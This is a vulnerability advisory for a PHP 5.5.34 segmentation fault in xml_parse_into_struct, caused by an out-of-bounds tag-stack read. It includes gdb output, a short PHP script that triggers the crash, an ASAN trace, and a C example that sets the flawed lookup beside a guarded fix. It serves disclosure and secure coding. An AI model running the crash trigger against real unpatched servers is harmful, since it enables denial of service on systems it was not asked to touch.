PHP 5.5.34 xml_parse_into_struct segmentation fault

2016.05.06
Credit: fernando
Risk: Low
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Description:
------------
Run test script with PHP/ASAN. I'm marking it as security since parsing xml coming from user is a common task, so apologies in advance if it's not security relevant.

(gdb) b xml.c:992
Breakpoint 1 at 0x83a3ae5: file /home/fmunozs/phpgit/php56dbg/ext/xml/xml.c, line 992.
(gdb) r
Breakpoint 1, _xml_characterDataHandler (userData=0xb5f5bba4, s=0x8d185e5 "aaaaaaaaaa", len=10) at /home/fmunozs/phpgit/php56dbg/ext/xml/xml.c:992
992 _xml_add_to_info(parser,parser->ltags[parser->level-1] + parser->toffset);
(gdb) print parser
$1 = (xml_parser *) 0xb5f5bba4
(gdb) print parser->ltags
$2 = (char **) 0xb5f5c894
(gdb) print parser->ltags[parser->level-1]
$3 = 0x5c7efff0 <error: Cannot access memory at address 0x5c7efff0>
(gdb) print parser->ltags[parser->level]
$4 = 0x0
(gdb) print parser->ltags
$5 = (char **) 0xb5f5c894
(gdb) print parser->level
$8 = 0
(gdb) print parser->ltags[parser->level-1] + parser->toffset
$9 = 0x5c7efff0 <error: Cannot access memory at address 0x5c7efff0>

parser->level is 0 and line 992 is trying to access element -1.

Test script:
---------------
<?php
$var1 = xml_parser_create_ns();
// feed an opening tag through xml_parse, leaving <xss> open
$var2 = "<xss>";
xml_parse($var1, $var2);
// reuse the same parser for xml_parse_into_struct with plain character data
$var2 = str_repeat("a", 10);
$var3 = [];
$var4 = [];
xml_parse_into_struct($var1, $var2, $var3, $var4);
var_dump($var3);

Expected result:
----------------
No crash

Actual result:
--------------
=================================================================
==4221==ERROR: AddressSanitizer: SEGV on unknown address 0x0000001d (pc 0xb6dc6256 bp 0xbfba8e18 sp 0xbfba89a4 T0)
    #0 0xb6dc6255 (/lib/i386-linux-gnu/libc.so.6+0x7c255)
    #1 0xb71e7655 in __interceptor_strlen (/usr/lib/i386-linux-gnu/libasan.so.2+0x6a655)
    #2 0x90e321f in _xml_add_to_info /home/fmunozs/phpgit/php56/ext/xml/xml.c:740
    #3 0x90ef305 in _xml_characterDataHandler /home/fmunozs/phpgit/php56/ext/xml/xml.c:992
    #4 0x90ff63b in _cdata_handler /home/fmunozs/phpgit/php56/ext/xml/compat.c:274
    #5 0xb6f33ec4 in xmlParseCharData (/usr/lib/i386-linux-gnu/libxml2.so.2+0x34ec4)
    #6 0xb6f4461c (/usr/lib/i386-linux-gnu/libxml2.so.2+0x4561c)
    #7 0xb6f44f62 in xmlParseChunk (/usr/lib/i386-linux-gnu/libxml2.so.2+0x45f62)
    #8 0x9103efb in php_XML_Parse /home/fmunozs/phpgit/php56/ext/xml/compat.c:605
    #9 0x90e0e8e in zif_xml_parse_into_struct /home/fmunozs/phpgit/php56/ext/xml/xml.c:1499
    #10 0x9a7dbe8 in zend_do_fcall_common_helper_SPEC /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:558
    #11 0x96417e6 in execute_ex /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:363
    #12 0x9a6de98 in zend_execute /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:388
    #13 0x9472029 in zend_execute_scripts /home/fmunozs/phpgit/php56/Zend/zend.c:1341
    #14 0x91ae13b in php_execute_script /home/fmunozs/phpgit/php56/main/main.c:2613
    #15 0x9a8795a in do_cli /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:994
    #16 0x808a502 in main /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:1378
    #17 0xb6d62645 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18645)
    #18 0x808aaba (/home/fmunozs/phpgit/php56/sapi/cli/php+0x808aaba)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==4221==ABORTING
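The gdb session shows the character-data handler running with parser->level == 0, so the unguarded index ltags[level-1] reads the memory just before the tag stack, and _xml_add_to_info then calls strlen on that garbage pointer. The C program below is an added example, not PHP's ext/xml code and not the upstream fix: it models the fields named in the session with a hypothetical struct (model_parser, record, current_tag_checked and the other names are assumptions of this example), places the flawed lookup beside a guarded one, and runs the guarded handler on both the level-0 state from the session and an ordinary one-open-element state.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Simplified model of the xml_parser fields named in the gdb session (added
 * example; the struct layout is hypothetical, not PHP's ext/xml definition). */
typedef struct {
    char **ltags;   /* stack of open tag names; ltags[level-1] is the innermost one */
    int    level;   /* number of currently open elements */
    int    toffset; /* bytes to skip at the front of each tag name */
} model_parser;

/* One entry of the structure xml_parse_into_struct builds: tag name plus text. */
typedef struct {
    char tag[32];
    char value[64];
} record;

/* Flawed lookup mirroring line 992: indexes ltags[level-1] unconditionally, so a
 * handler running with level == 0 reads ltags[-1], the memory before the stack.
 * Kept for comparison only; never called with level == 0 in this example. */
static const char *current_tag_unchecked(const model_parser *p) {
    return p->ltags[p->level - 1] + p->toffset;
}

/* Guarded lookup: NULL when no element is open or the innermost slot is empty. */
static const char *current_tag_checked(const model_parser *p) {
    if (p->level < 1 || p->ltags == NULL || p->ltags[p->level - 1] == NULL) {
        return NULL;
    }
    return p->ltags[p->level - 1] + p->toffset;
}

/* Model of the character-data handler: attach `len` bytes of text to the open
 * element. Returns 1 when a record was produced, 0 when the data had no open
 * element to attach to (the state in which the real handler crashed in strlen). */
static int character_data_checked(const model_parser *p, const char *s, size_t len,
                                  record *out) {
    const char *tag = current_tag_checked(p);
    if (tag == NULL) {
        return 0;
    }
    if (len >= sizeof out->value) {
        len = sizeof out->value - 1;
    }
    snprintf(out->tag, sizeof out->tag, "%s", tag); /* strlen(tag) is safe here */
    memcpy(out->value, s, len);
    out->value[len] = '\0';
    return 1;
}

/* State from the page's gdb session: level 0, ltags[0] == NULL, character data
 * "aaaaaaaaaa" arriving. The guarded handler skips it instead of reading ltags[-1]. */
static int demo_level_zero(record *out) {
    char *stack[2] = { NULL, NULL };
    model_parser p = { stack, 0, 0 };
    return character_data_checked(&p, "aaaaaaaaaa", 10, out);
}

/* Ordinary state: one open element <xss>, the same character data inside it. */
static int demo_open_element(record *out) {
    char *stack[2] = { "xss", NULL };
    model_parser p = { stack, 1, 0 };
    return character_data_checked(&p, "aaaaaaaaaa", 10, out);
}

/* With an element open, the guarded and unguarded lookups return the same tag,
 * so the guard changes behaviour only in the level-0 state that crashed. */
static int lookups_agree_when_open(void) {
    char *stack[2] = { "xss", NULL };
    model_parser p = { stack, 1, 0 };
    return strcmp(current_tag_unchecked(&p), current_tag_checked(&p)) == 0;
}

int main(void) {
    record r;
    printf("level 0: record produced = %d\n", demo_level_zero(&r));
    if (demo_open_element(&r)) {
        printf("level 1: tag=%s value=%s\n", r.tag, r.value);
    }
    printf("lookups agree when open: %d\n", lookups_agree_when_open());
    return 0;
}
```

The guard is the check a reviewer would ask for at the call site of any `stack[level - 1]` access: character data delivered by libxml2 while the PHP-side tag stack is empty must be dropped or reported, never attached to a tag name read from before the array.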


Copyright 2024, cxsecurity.com
